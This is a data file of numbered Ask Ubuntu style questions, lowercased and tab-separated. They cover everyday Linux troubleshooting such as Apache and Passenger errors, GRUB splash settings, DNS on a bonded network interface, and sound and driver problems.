352210	vps apache config - invalid command 'passengerdefaultruby ' after adding latest passenger gem	used to have this list of rubies in my vps : ruby-1.9.2-p320 [ i686 ] =* ruby-1.9.3-p194 [ i686 ] ruby-1.9.3-p374 [ i686 ] ruby-1.9.3-p392 [ i686 ] today i installed a new app on this vps on ruby 2.0 , so i added 2.0 to rvm : ruby-1.9.2-p320 [ i686 ] ruby-1.9.3-p194 [ i686 ] ruby-1.9.3-p374 [ i686 ] ruby-1.9.3-p392 [ i686 ] =* ruby-2.0.0-p247 [ i686 ] installed passenger and passenger-apache-module , instructions says to add these lines : loadmodule passenger_module /usr/local/rvm/gems/ruby-2.0.0-p247/gems/passenger-4.0.19/buildout/apache2/mod_passenger.so passengerroot /usr/local/rvm/gems/ruby-2.0.0-p247/gems/passenger-4.0.19 passengerdefaultruby /usr/local/rvm/wrappers/ruby-2.0.0-p247/ruby to /etc/apache2/apache2.conf and restart apache , after restart i got this error : syntax error on line 242 of /etc/apache2/apache2.conf : invalid command 'passengerdefaultruby ' , perhaps misspelled or defined by a module not included in the server configuration action 'configtest ' failed . the apache error log may have more information . ... fail ! and one more problem , when i open my app at http : //nccm.md i got : could not find rake-10.1.0 in any of the sources ( bundler : :gemnotfound ) from gem list command i can see this gem is installed in ruby 2.0 environment , but the app looks for it in usr/local/rvm/gems/ruby-1.9.3-p194 @ global and not in ruby-2.0.0-p247 @ global . why is that ? thank you for any help .
352211	how do i connect two networks for specific applications ?	i have one lan connection and another usb internet modem how i can use both same time for specific applications with out any overlapping ?
352217	why am i shown the setup screen ( choose language ) after every reboot ?	i get the setup screen where it asks me to choose language after i reboot the ubuntu server . it happens after every reboot . how could i git rid of it ?
352218	how do i find out what is running immediately following login ?	a few weeks ago , i must have installed an update or new package that now gives me ~10 seconds of black screen immediately following login , until my wallpaper and the unity interface appears . sometimes , but not always , it takes an extra ~3 seconds for the appindicators ( including the shutdown/settings indicator ) to appear . from what i understand , bootchart only measures the boot process until the login screen is reached . is there a similar utility that can track which processes run at login ?
352219	installation of ubuntu with cd does not start	hi guys here is my problem : i am trying to install ubuntu 12.10 from a dvd ( because the file is 7mb too big for a cd ) for my parents , but after getting these seven options : boot device menu normal integrated nic hard disk drive c ide cd-rom device system setup ide drive diagnostics boot to utility partition enter a choice 4 i choose 4 , but while it says it has chosen 4 it does nothing . any help would be appreciated .
352220	installing ubuntu 12.04 64bit on ssd does n't find the harddrive	i 'm having trouble with my ssd ( intel 520 series , 120gb ) when i 'm trying to install ubuntu on my computer with a usb . it does n't recognize my hard drive under the partition part . i 've been switching sata ports just to see if there is something wrong with that , but no luck there . my sata are set in ahci mode and i 'm using msi z77 mpower as a motherboard . i 've also tried with raid mode but that did n't go either . can i open the terminal and execute some commands for `` repairing '' something or what do i have to check or do to ?
352221	bug in krusader lost directory subtree . how to recover the files ?	using krusader version 2.4.0-beta1 ( thanks canonical for using me as ginnea pig without my knowledge ) , i renamed two directories to replace the spaces in the names with underscores . unfortunately , immediately after doing so , the files and directories below my security web directory completely vanished . how can i recover them ? the path i altered was : /home/peter/documents/business from 2005/security web/ which should have become : /home/peter/documents/business_from_2005/security_web/ i 've altered it back , in the hope that the files would reappear , but they did n't . i have just one disk , this being a laptop and it 's all one partition , except for swap . i attempted to force a disk check at the next restart using : touch ./forcefsck but it did n't seem to work since the next startup took no longer than normal despite having nearly 400gb of files to check . also the above fsck method seems somewhat lame to me ( even if it did work ) , since how can you pass parameters to fsck ? is there a way to do that ?
352222	kate , kdenlive can not be installed along with mit-scheme in ubuntu 13.04	if kate and kdenlive are installed mit-scheme can not be installed . if mit-scheme is installed , kate and kdenlive can not be install . one requires the removal of other . can anybody suggest a possible solution .
352224	howto start scripts before/after : startup / reboot / suspend / hibernate / powerup / etc	this is what i have so far , but for some reason it doesnt work : cd ~ cd /etc/pm/sleep.d/ sudo touch 99mystartup.sh sudo nano 99mystartup.sh chmod +x 99mystartup.sh # ! /bin/bash # ! /bin/sh echo â $ ( date ) : script called with $ 1 ? > > /home/serapath/sleep.txt case $ 1 in hibernate ) echo `` hey guy , we are going to suspend to disk ! '' ; ; suspend ) echo `` oh , this time we 're doing a suspend to ram . cool ! '' ; ; thaw ) echo `` oh , suspend to disk is over , we are resuming ... '' ; ; resume ) echo `` hey , the suspend to ram seems to be over ... '' ; ; * ) echo `` somebody is calling me totally wrong . '' ; ; esac press : [ f3 ] press : [ enter ] press : [ ctrl+x ] i also read about /etc/rc.local and /etc/rc0.d and /etc/rc6.d and scripts inside those directories have to start with k99 . do i need this ? the stuff above is only about sleep/resume , but i also need on startup/shutdown/reboot . havent found a clear tutorial how to use /etc/init nor what a script i put there should look like . ( i imagine some kind of template like the one above ? ) i tried this : serapath @ vm-0 : /etc/pm/sleep.d $ cd ~ serapath @ vm-0 : ~ $ cd /etc/init serapath @ vm-0 : /etc/init $ sudo touch 99mystartup.sh serapath @ vm-0 : /etc/init $ sudo nano 99mystartup.sh serapath @ vm-0 : /etc/init $ sudo chmod +x 99mystartup.sh // add # meine ersten schritte mit upstart description `` simples upstart-beispiel '' # wann starten bzw . stoppen ? start on runlevel [ 2345 ] stop on runlevel [ ! 2345 ] env enabled=1 path_bin=/bin/bash exec echo `` hallo welt $ ( date ) '' > /home/serapath/restart.txt // press : f3 // press : enter // press : ctrl+x but for some reason , that doesnt work too : - ( additionally : is it possible to just use one place instead and link that script into both init and sleep.d directories ? maybe with symlinks ? ) thank you very much
352227	can not ( un ) mount unknown device	recently i found an unknown device with a strange name . there is no external device connected to my computer . i would like to know what it is , where it might come from and how i can remove it . who can help ? see the following screenshot for details : to create it i right-clicked on the corresponding icon ( still highlighted ) in nautilus and chose `` mount '' .
352231	how to set new login keyring password	i brought my p.c from a shop here in kochi.i asked them to install ubuntu 13.04 . after i brought system to home i understood that they didnt gave me user password to login . ( they had created a user named user during installation ) .so i set new password by typing commands in to terminal in recovery mode . ( activated root user and set new password for the user ) .but later while using some applications it is asking for login keyring.my new password does n't . matches the keyring password.help me
352232	how to change to other desktop environment on vnc sessions ?	on my system i will use vnc to login . but at this time , after connect to the pc , i get the automatic login with unity desktop . what i have to do , to have gnome desktop on vnc connection instead of unity ?
352237	wine 1.5 - 64 bit - bad exe format	i downloaded the source code of wine from winehq and compiled it with necessary plugins . finally installed the same on my 64 bit linux machine . ( wine 1.5.31 ) i now wish to install a software which i have installed on many microsoft windows pcs . the exe file is now giving me a bad exe file error . any clues ?
352241	ubuntu 13.04 shutdown problem . got no idea what to do next	i have been using ubuntu for two years now and had few actual problems . i have searched this site and tried various things to no effect . i will do my best to explain , and certainly include too much info as i have no idea what my problem really is . please take answers to the 'for dummies'-level and i shall certainly do my best to understand ! so , i have this lovely acer travelmate 5310 from around 07 that 's causing a bit of a headache . it 's vista was removed and replaced with ubuntu 11. ? ? some two years ago and was updated to the 12.04 lts at some point before christmas . it has worked well except a problem with the network that 's solved with a plug in reciever . all was just fine until i two days ago wanted to install the latest version , 13.04 . i by accident installed 12.04lts again and thought it wo n't matter . the problem with shutdown started after this , and we have finally arrived at the point of all this . it wo n't shut down . i removed the 12 and installed the 13 last night thinking the problem might go away . it installed and updated and whent for a restart without problems but came to a halt at the purple screen . i performed the hard shutdown ( the press button method ) and restarted . it boots up with ease and all is really well but it simply can not shut down . it now hangs on a black screen with loads of white numbers , words and other such terminal-like things . so i push and hold shutdown to turn it off . i tried the answer from my computer wo n't shut down . then tried the acpi=off in terminal but nothing works . i have yet to try the command shutdown -h now but i now managed to hit esc at the right time and go behind the first screen and see the next . i am sorry that i have no pictures to show you . the processes that seems to fail are two : *killing all remaining processes ... . [ fail ] modem-manager [ 953 ] : < info > caught signal 15 , shutting down ... then follows ok 's on deactivating swaps , unmounting filesystems . then : *stopping remanining crypto discs ... [ ok ] *stopping early crypto discs ... [ fail ] unmount : /run/lock : not mounted unmount : /run/shm : not mounted mount : / is busy *will now halt and that is where it hangs.. i hope you are able to understand anything . i have no idea .
352246	setting dns-nameservers on a bonded network connection	we have a server running ubuntu 12.04 server . there are two network interfaces on this server ( eth0 and eth1 ) , which we 've bonded as bond0 . dns is not working currently.. if i ping google.com i get can not resolve host , but i can ping google 's ip addresses fine . from what i 've read , we just need to add dns-nameservers into /etc/network/interfaces , but i 'm unsure if it 's going to work the same with a bonded connection . this is on a live production server with tons of users , so obviously do n't want to screw up the network connection , as i only have ssh access ! could anyone tell me if this is the correct way to do it ? is it correct to add the nameservers to the bond rather than each individual interface ? # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet manual bond-master bond0 auto eth1 iface eth1 inet manual bond-master bond0 auto bond0 iface bond0 inet static address 192.168.1.15 gateway 192.168.1.100 netmask 255.255.255.0 dns-nameservers 8.8.8.8 8.8.4.4 208.67.222.222 slaves eth0 eth1 or is there an easier way to update the nameservers ? we used to put them in resolv.conf but this now gets overwritten on reboots .
352248	gtk applications in kde	the problem is that i can not integrate gtk applications in kde ( kubuntu 13.04 ) . my version of kde is 4.11 , from kubuntu-backports . the same exact problem appears in 4.10.5 , from raring-updates . i recently reinstalled the system and removed my home folder , to get rid of old thing that i was carrying with me since too much time , so no previous settings are involved into this . the gtk application i use most is chrome ( updated flash + sync of data with smartphone , + other things ) , so i can workaround with a specific theme for it . but also gparted is gtk , as bumblebee-config , and many others . at this moment , the gtk applications have squared buttons , like very old-style gnome applications ( or win98 , for people not familiar with gnome ) and the colours in them are absolutely `` random '' ( violet background when selecting text , dark blue in menus ) . before reinstalling and removing data from the home folder , gtk applications were well-integrated with kde and oxygen themes . as you can see , the theme oxygen-gtk is installed and activated . but the rendering of gtk applications is very poor : full gparted window and a menu detail . any idea ? : ) many thanks .
352249	syslinux 4.04 2010-10-22 edd copyright ( c ) 1994-2011 h. peter anvin et al	when i boot ubuntu from my usb live i get : syslinux 4.04 2011-04-18 edd copyright ( c ) 1994-2011 h. peter anvin et al burned with lilo , when i burn with unetbootin i get : syslinux 4.03 2010-10-22 edd copyright ( c ) 1994-2011 h. peter anvin et al i have a 8gb sandisk cruzer edge ...
352251	long terminal output ; time consuming code ; no forethought	i am running a rather complex python script in ubuntu 12.10 for the last seven days . it must have generated atleast 20k lines of output on the terminal till now but not all of it is visible . i did n't have the foresight to enable unlimited scrolling on the terminal neither did i try something like saving the output to some file . but now i am running out of time and i just ca n't think of rerunning the entire code again and try such options . does anyone know how can i see the complete output now without having to rerun the script ? many thanks
352255	can not get into mac os from ubuntu start up screen	i have my imac dual booted with ubuntu 13.04 , now when i start the computer i get the purple screen asking me to select which os i want to go into . when i click mac os 64bit i get an error about an invalid kernal address . is there anyway to correct this ? any advice is greatly appreciated !
352257	install brother hl 2240d drivers	recently i bought a brother hl 2240d laserprinter , but i ca n't install the drivers . i followed the instructions on the linux website from brother but it did n't worked . could somebody help me ? thanks . i am using ubuntu 12.04 lts
352259	show grub2 splash screen with quiet grub	as the grub splash screen shows far longer than plymouth on my box , i wanted a nice background there as well . i set it up , but it only works when grub_timeout is greater than zero , although this post http : //ubuntuforums.org/showthread.php ? t=1302743 says : to hide the menu on boot : there should be no # symbol at the start of the line : grub_hidden_timeout=0 line . `` 0 '' in both entries ( grub_timeout & grub_hidden_timeout ) above should boot the system without a timeout . a positive integer will leave a blank screen for that number of seconds , allowing the user time to press `` esc '' or `` shift '' to display the menu . the splash screen will still display during the timeout . so i do not want the grub2 menu to show , but the grub2 splash screen . is this a bug ? can i fix it ? specs : - ubuntu 12.04 - kernel 3.2.0-54-generic 64-bit - grub2 package version 1.99-21ubuntu3.10 /etc/default/grub : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=0 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' grub_gfxmode=1280x1024x24 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' grub_background= '' /boot/grub/grub_background.png ''
352262	unstoppable audio message from speakers	i am new here , i have this message coming out from the speakers connected to the line out green connector , but i think it has to do more with software than hardware https : //docs.google.com/uc ? export=download & id=0bwnqnybq5t0myjfha1lqykv0sms that link is the very message i get . does anyone can say what it is and how to stop it ?
352263	configure : error : can not found libreadline but already installed libreadline . how to solve this ?	i 'm new to ubuntu . when i tried to install netmateflow-calc , it shows an error like this configure : error : libreadline not found . but i have already installed libreadline-dev with a new version . how do i solve this ? thanks in advance
352264	accidentally removed every package containing text `` win ''	i am a novice linux user and accidentally uninstalled a lot of packages . i was attempting to do a clean install of wine using the advice on this help page : how do you uninstall wine 1.5 ? and before i noticed a warning by a later user , i opened my terminal and executed : apt-get remove wine\* apparently apt-get interprets characters like * as symbols in a regular expression , not as shell-style wildcards , and i just removed most packages with the string `` win '' in their names on my computer . i exited the terminal before everything shut down . is there a way to reinstall these packages and patch my system without doing a fresh os install ?
352265	how can i make xubuntu automatically tally the number of times a machine loads ?	i would like to pilot xubuntu in a school computer lab environment . the solution requires shared access devices that are independent of the school 's windows environment . i would like to collect data comparing the usage of this lab compared to traditional windows labs . is there a script or command that can run on start up that will just keep a tally of how many times the machine is turned on ?
352274	i ca n't install ubuntu . problems with my hard drive	i have a lap top hp pavilion dv6 . the windows 7 partition is of 443 gb , and i have 120 gb of free space there . i want to reduce the size of that partition so i can create a new partition of 60gb for ubuntu . i used the disk manager in windows , but it says that i can only reduce that partition by 1gb , and obviosly i ca n't install ubuntu in a partition of that size . i already defragmented my hard drive , but it only gave me 500mb of aditional space . i have installed ubuntu with wubi in this laptop , but i would like a permanent solution , without losing windows .
352278	error : ca n't change mac : interface up or not permission : invalid argument	so , i was messing around with aircrack & macchanger and following some tutorials . i typed the following command into the terminal macchanger -- mac 00:11:22:33:44:55 wlan0 and i got the following error error : ca n't change mac : interface up or not permission : invalid argument i have no clue what this means , so i done some digging through google and come across one article here and if you go the the third comment from the bottom , someone else has run into the same problem , and there was a reply in the second comment from the bottom that simply stated . as you have guessed , this means that the linux driver for your device does n't allow changing the mac address ( whereas the windows one does ) . unfortunately , there 's not much you can do about it , other than patching the driver yourself or bugging realtek about it . ok , well why is that so ? that 's pretty stupid , is there any way to get around this , or what drivers am i supposed to be looking at replacing ? how do we go about `` patching the driver '' ?
352282	connecting to ubuntu using remote desktop connection on windows 7	i 'm trying to connect to a machine with ubuntu from a different machine running windows 7 using the windows program remote desktop connection . i used the command : sudo apt-get install xrdp which worked , except that when i connect from my windows i can only see the blank desktop background of the remote ubuntu . the taskbar , icons etc are all missing . does anyone know how to fix this ? thanks
352283	check bluez version on ubuntu 12.04	i am using 12.04 on my machine . i want to check which version of bluez right now my machine using . how to check that .
352284	kill sudo with specific time every time	we all know that in ubuntu sudo password will be auto saved for 15 minutes and expires after that . but i want to make it for quick expire . i mean i dont want to change any settings and when i ever i want , my system should have to release the password with out storing for 15 min . i mean it should store only 3 min or 4 min for example . how can i do that ?
352287	logs dpkg installation points before i install ubuntu	good afternoon guys , analyzing logs of my installation of ubuntu 12.4 lts , i noticed that there logs ( dpkg ) on 13 february , and have installed the os does not have even 1 month . can anyone tell me if this type of logging is common there even after installing the os and came up with earlier ? thanks for listening !
352288	live usb -add files ?	i have ubuntu on a usb drive , each time i boot it it is a clean installation , i.e . there is no persistent files . i would like to be able to boot it up , and access a couple f files from the usb ... as in have files already in the ubuntu system ? is there anyway of adding them to installation files on the usb ?
352291	keeps cycling back to login screen	windows xp pro i installed ubuntu using the windows installer but it does not work properly . initially i got the login screen and entered the password . it started to load the desktop but never did completely load ... . no icons etc . it then returned to the login screen . i re-entered the password ... . black screen for awhile ... then the default color screen without anything else . after quite awhile , it returns to the login screen . re-entered the password ... black screen ... . return to login . completely un-useable ... . wanted to try ubuntu but i am not a computer geek so i suppose it is a lost cause ... ..
352293	libreoffice crashes when saving document ( tried deleting profile dir )	i have an .ots template file at the directory : /home/peter/documents/business_from_2005/security_web/ which was changed earlier today , from : /home/peter/documents/business from 2005/security web/ since i made that change , when i open my my .ots file from that directory , it 's ok , until i try to save it , then the frame of the `` save as '' dialog appears but then crashes and needs to be forced to close . it seems to me that it 's trying to open the last directory that i saved a file in , but because the path has changed it ca n't find it and therefore instead of handling it nicely it just crashes . i 've tried renaming my libreoffice profile directory , but despite it creating a new one , the same thing happens when i try to save my document . maybe the erroneous path is saved inside the document source code itself ? how can i fix this please ? i 'm using ubuntu 12.04 lts , and libreoffice 3.5.7.2 build id : 350m1 ( build:2 ) on kde desktop .
352296	`` install '' option is not appearing in ubuntu software center in ubuntu 13.04	recently i installed ubuntu 13.04 ( x64 bit ) and i am new to linux . in `` ubuntu software center '' the right side `` install '' button is disappearing when i am trying to install software . instead of `` install '' button `` use this source '' button is appearing . `` install '' button was appearing previously , but not now . already tried with below two commands , still `` install '' button is not appearing . sudo rm /var/lib/apt/lists/lock sudo rm /var/cache/apt/archives/lock please help me how can i get back .
352298	how to give different permissions to multiple groups of users ?	i installed ubuntu 12.04 server and want to give full folder access say example : `` folder01 '' to group `` group01 ' and limit `` group02 '' for read access only . how i can do this .
352301	how to make ubuntu as default os	i tried to install ubuntu on my acer c7 chromebook and i am using it now . i want to change it as my default os but as i type the command : sudo cgpt add -i 6 -p 5 -s 1 /dev/sda and then `` password user : '' appears and when i tried to type user as the password , it doesnt work . i mean i cant type it 's as if the keyboard is not working . i did this twice actually but got the same result . please please please help me ! t__t thank you !
352302	xorg , jetty , and lightdm all crash my system when run	whenever i start xorg my computer crashes . i am brought out to a black screen much like the one that it shows when i shut down my computer . after displaying this screen for awhile it kicks me out to the login screen . the same thing happens whenever i try to run jetty or lightdm . could it be a problem with my really really old crappy ati drivers ? i know it 's not a problem because of corrupted xubuntu files , because i just did a fresh install of xubuntu 13.04 about a month ago , and have n't tampered with it at all .
352306	how to make all new files in a directory executable	i want a way by which whenever i create a new file in a particular directory , i want it to be executable by default . is this even possible , if so how ?
352307	ubuntu crashed pc on install over xp on dell desktop	tried to install ubuntu on dell pc running xp selected install linux over xp and it started but then crashed now pc will boot to ubuntu start up then goes to a black screen and does nothing
352312	use remmina to rdp into home remote desktop gateway server	i have windows server 2012 r2 running at home which is hosting `` anywhere access '' and acting as a remote desktop gateway server . i have tried using remmina to rdp into this gateway but i ca n't seem to find a successful combination of parameters to get in . i 'll try to explain the scenario below ... gateway server : mydomain.remotewebaccess.com client : myclient1 domain : mydomain.local user : user password : password so , by default , anywhere access allows me to remote into any win7/8 pc on my home network through it 's web interface . i click a pc , it initiates an rdp connection with the selected pc . port 3389 does n't have to be opened on my router , but 80 , 443 , 500 , 1701 , and 1723 must be open for anywhere access to work . within remmina , i tried the following : server : mydomain.remotewebaccess.com user name : mydomain\user password : password domain : mydomain.local security : ( tried nla , tls , rdp , negotiate with no luck ) client name : myclient1 this combination of settings is n't working and i 'm not too sure what it takes to make remmina play nicely with an rdp gateway that does n't use port 3389 . any suggestions ?
352323	creating startup program for all users 12.04 - only working for 1 user	in ubuntu 12.04 lts desktop , i 'm trying to have chromium start up automatically for all users upon login . i did the following : sudo cp /usr/share/applications/chromium-browser.desktop ~/.config/autostart/ what happens is that chromium only starts up for user that created the directory , and not any other users .
352324	ubuntu 12.04 lts -- mobile broadband menu appears just sometimes	i have a mobile surfstick ( telekom lte ) which runs very fine on my ubuntu 12.04 lts . the problem is that the entries in the networking menu ( upper right edge of the screen ) only appear sometimes . with `` the entries '' i mean the `` enable broadband '' , `` new broadband connect '' and so on . the stick is plugged in and if it happens that these entries appear i can connect to the internet without any issue , but if not what can i do ? greetings philipp edit here is the output of rfkill list : 0 : phy0 : wireless lan soft blocked : yes hard blocked : no 1 : brcmwl-0 : wireless lan soft blocked : yes hard blocked : no 2 : acer-wireless : wireless lan soft blocked : yes hard blocked : no 3 : acer-bluetooth : bluetooth soft blocked : no hard blocked : no 4 : hci0 : bluetooth soft blocked : no hard blocked : no edit 2 as suggested i rebooted , the mobile stik did not work anymore and running rfkill list gave no hard blocked state . edit 3 now i rebooted to ubuntu ( presseing the âťrestartâť button on windows ) and the stick works like a charm .
352325	unable to save firefox preference - ubuntu firefox modifications malware ?	i was not able to save all my preferences in firefox by about : config or by editing prefs.js/user.js . yahoo always came back as the default search engine and start page when i restarted firefox . disabling ubuntu firefox modifications 2.6 extension fixed this problem ( and re-enabling it forces me back to yahoo ) . is the ubuntu extension some kind of malware ?
352326	chromebook usb to usb connection	is it possible to run ubuntu , on another cmputer and boot a chromebook from hard drive of other computerwith ubuntu . or ( windows ) os from external hard drive for acer chrome book or connect usb to usb to a lenovo that has unix/linux and windos 7 or 8 ?
352327	kubuntu 13.04 got installed inside win7 , but does n't appear in boot menu	need someone to help me . this is for the first time i am trying to get my problem solved in forums , although i have been using ubuntu for quite some time . first thing , i never used ubuntu in parallel to windows os . i always installed ubuntu inside windows , with a dedicated drive for ubuntu . i did the same thing recently on my new lenovo laptop . i created a separate drive of 50gb solely for ubuntu . i downloaded ubuntu 13.04 iso file and extracted . i copied the extracted folder in the dedicated drive . using the wubi installer in the folder , i chose kubuntu from the dropdown menu of desktops.it downloaded full kubuntu 13.04 and installed . it also shows up in windows control panel/programs and features . but i can not see anything in boot menu . it is as if there is no other os at all . after such a huge download of the entire kubuntu 13.04 , i do not want to simply uninstall for a clean drive again . please help if there is a way to boot into this newly installed kubuntu 13.04 . thank you .
352328	cant mount filesystem error on installation	i use windows 95 as my primary operating system and tried to install ubuntu linux 13.04 . when i booted the computer with usb ( created using universal usb installer ) , i get `` ca n't mount filesystem '' error . i tried creating another bootable usb of boot-repair-disk-32bit.iso , and tried recommended repair option . it said that the errors have been fixed , but when i try again , i get the same error . here is the ur that the repair tool generated . http : //paste.ubuntu.com/6179880/ i really want to give linux a shot , but its giving me a hard time .
352329	hard disk curruption when away from home	using ubuntu 13.04 on a standard hd in my lappy . i had previously had a ssd but it corrupted 1 week before failing totally after battery ran flat . i 've had suspicions that my m/b caused this failure so purchased another however ! ! , it 's done it again . ! , however , being super cautions , backups , etc . nothing lost . i have to boot up on live usb , do a check disk with -f option , otherwise it reports the disk is clean , it finds a load of errors , i say ( y ) es lots , after which i reboot to a totally , `` nothings happened here '' working machine . without the check disk it 'll sit there for hours and if i ctrl-alt-f1 and try to log in ( terminal style ) , it will report what looks like dma errors and hang and mess me about . q1 , i see no harm in the system after reboot , nothing seems to be missing and everything works . ( would n't get that with windoze ) q2 , i think i may have the asnwer but would like someone to point me in the right direction . i 'll explain.. i followed this ( http : //ubuntuforums.org/showthread.php ? t=288534 ) to mount my netgear nas drive speedstor whatever , without this procedure , i have all sorts of read and write problems , hangings , corrupt files , o the nas drive , it 's a mess basically . i chose to follow the auto-mount procedure with the credentials stored in root , all works fine and dandy , except when i 'm away from home , then it hangs . i guess in some kind of endless loop waiting for the nasdrive . is there a test i can perform before mounting for it 's presence ? ? i could have decided to place a button on my desktop to root mount but i decided the auto option . normally at home everything works fine , just when i go away . seems to happen with both suspend and complete shut ubuntu 13.04down . appreciate any help
352333	why does ubuntu not lock ata-password protected disc on reboot ?	i am on a acer timeline x 4830tg laptop . currently using ubuntu 13.04 . i do use 2 hdds instead of the dvd-rom drive . i can set ata passwords within bios for both drives ( which i have done ) . if i cold-start the machine i am forced by bios to enter the hdd passwords ( at least i must unlock the one which is marked as bootable ) . than grub starts and i can boot into ubuntu . if i did not unlock the second harddisk i will get many log lines about /dev/sdb not be accessible . ( see kernel.log here : http : //paste.ubuntu.com/6179903/ ) [ also not this second harddrive is not mounted via fstab nor are there any requird partitions for ubuntu , it is instead a ntfs volume which i manually mount if i need to acess this data-grave ] but anyway : the main problem and question is : why the heck does ubuntu not lock the 1.hdd if i reboot it ./ . why does it only lock the 2.harddrive if it was unlocked before reboot ? the result is this : i reboot ubuntu , 2 . hdd gets locked , first stays unlocked , bios won't ask for hdd password ( of the second , locked hdd ) so i end up with above linked errors on bootup and also am unable to acess the second hdd from within ubuntu , cause it is locked . my expected behaviour would be either : both drives get locked during reboot , or none of them gets locked , so the state after reboot will be like it was before . thanks for answers in advance .
352334	is there any way to cancel background noise from being recorded into my microphone ? globally ?	on windows i used to take advantage of acoustic echo cancellation and noise suppression but no such features exist in pulseaudio and have n't since i can remember . my system is a laptop , acer aspire v3-571g and you can guess it ran realtek drivers as usual . ubuntu 13.04 , 13.10 , 12.10 , i do n't mind which version a fix applies too , as long as it 's one of those three .
352337	linking to an executable with options	i want to have a link to an executable as follows , the equivalent terminal command is : mathematica -mesa the command ln -s mathematica -mesa mathematica does not work , how can i include -mesa in the link ? thanks , woody
352338	`` apt-get '' ruined after a failed ppa addition . how do i fix this ?	i was trying to xdman from the nooblabs ppa however something just went wrong now `apt-get is ruined . here 's what i get when i try to run the update manager : also when i try to correct the error ( as directed by synaptic package manager ) , i get this message : reading package lists ... done building dependency tree reading state information ... done e : the package oracle-java8-installer needs to be reinstalled , but i ca n't find an archive for it . how can i rectify this problem ? thanks in advance .
352345	how to convert softsubbed .mkv to hardsubbed mp4 file using mencoder ?	as the title says , i have single mkv file which contains subtitles , is it possible to convert using avconv or mencoder ? media info of the file : input # 0 , matroska , webm , from 'r.mkv ' : duration : 01:58:53.22 , start : 0.000000 , bitrate : n/a stream # 0.0 ( eng ) : video : h264 ( high ) , yuv420p , 1280x544 [ par 1:1 dar 40:17 ] , 23.98 fps , 23.98 tbr , 1k tbn , 47.95 tbc metadata : title : a stream # 0.1 : audio : aac , 48000 hz , stereo , s16 ( default ) metadata : title : b stream # 0.2 : subtitle : [ 0 ] [ 0 ] [ 0 ] [ 0 ] / 0x0000 ( default ) metadata : title : c
352347	how do i get emacs to open in the terminal when it is being used as the config editor ?	i like to use emacs as my configuration editor , so it is the default for programs like git or cron . so i used sudo update-alternatives -- config editor and chose emacs24 from the list . unlike vim or nano , this launches emacs as a new gui application , rather than taking over the current terminal window . is there a way to make emacs open in the terminal as a configuration editor , or maybe when it is invoked from the command line , but still allow for launching emacs as a stand-alone application from the launcher or dash ?
352351	mouse scroll wheel moves window content too far each gradation	on some linux distributions , such as ubuntu , moving the scroll wheel causes the window to move too far , usually skipping some content . it quite frustrating because it means i have to use the window slider to scroll the screen content .
352352	no sound after updates	sometimes i encounter a strange problem with sound on ubuntu 13.04 . everytime i install an update ( regardless how minor the update is or what parts of the system are updated ) and reboot after this , i have no sound . then , if i boot into windows ( i have a dual boot ) , the speakers make a cracking sound and everything works in windows . after booting back into ubuntu , sound works again fine . i just did some quick checks : cat /proc/asound/cards 0 [ pch ] : hda-intel - hda intel pch hda intel pch at 0xf6210000 irq 44 1 [ nvidia ] : hda-intel - hda nvidia hda nvidia at 0xf6080000 irq 17 aplay /usr/share/sounds/alsa/front_center.wav playing wave '/usr/share/sounds/alsa/front_center.wav ' : signed 16 bit little endian , rate 48000 hz , mono so alsa should work . i also unplugged/plugged my front and back audio , but nothing changes . as i can fix this problem with rebooting , it is not critical . but it is extremly annoying .
352353	installing 3rd party driver . beginner 's guide	so there is an app that allows me to use my android tablet as a pen tablet . i have the app installed in my phone however i have to install the drivers for the desktop . the instructions are here : http : //rfc2822.github.io/gfxtablet/ # part-1-uinput-driver as the guide says , i downloaded the binary , used chmod a+x { filename } . however , i can not run it . when i double click it , nothing happens . can someone please help me out with this ? i have ubuntu 12.04 lts 32 bit
352355	i am not able to locate /usr/bin/software-center file	i ca n't fine the /usr/bin/sofware-center file . i need it to install an english dictionary . ubuntu is up to date .
352362	bluetooth keyboard wo n't work ubuntu 12.04	i am using ubuntu e command tried everything , even using the command line . i have tried the advise on ubuntu 's support pages , bluetooth from the command line in 12.04 ? as well as installing blueman manager and the bluetooth support packages . i have found that the devise connects fine , but i just can not type , whatever i do . i managed to get it to work once , but never again since then . so bassically , how can i get it so my bluetooth keyboard will type ? thanks tom
352363	virtualbox , maas : help needed	ok , i made some progress wrt the original question ( still below ) . i found /etc/maas/dhcpd.conf contained option domain-name-servers 10.0.3.15 , and changed it to 192.168.0.11 . after restarting the daemon , i now see `` node '' getting the right dns , unfortunately this does n't fix the main problem , which i believe is the reference to 169.254.169.254 . it does introduce a new question : while the remaining information from /etc/maas/dhcp.conf is present in the maas gui , there is no field to enter the dns address . why ? anyway , my original problem still stands ... any idea ? original question follows . in virtualbox , i have : master vm : ubuntu 12.04.3 server eth0 : internal network , ip= 192.168.0.11 eth1 : nat , ip= 10.0.3.15 eth2 : host-only , ip= 192.168.56.102 running maas region and cluster controlller , with dhcp and dns enabled node vm : eth0 : internal network node vm boots in pxeboot . dhcp succeeds , and the boot process starts , but during boot i see some issues . one of them is `` disk drive not ready yet or not present '' for / and /tmp . i 've googled this issue , and some people say it happens when the fisical disk is a ssd , which is my case . anywaythe system seems to recover from this eventually . immediately after it starts printing a lot of messages of the form : 2013-10-01 16:52:37,142 - url_helper.py [ warning ] : calling 'http : //169.254.168.254/2009-04-04/meta-data/instance-id failed [ x/y ] : url error [ [ errno 113 ] no route to host ] that ip address is clearly bogous , not sure where it came from . before that point , i had seen the following network configuration : address : 192.168.0.100 broadcast : 192.168.0.255 netmask : 255.255.255.0 gateway : 192.168.0.1 dns0 : 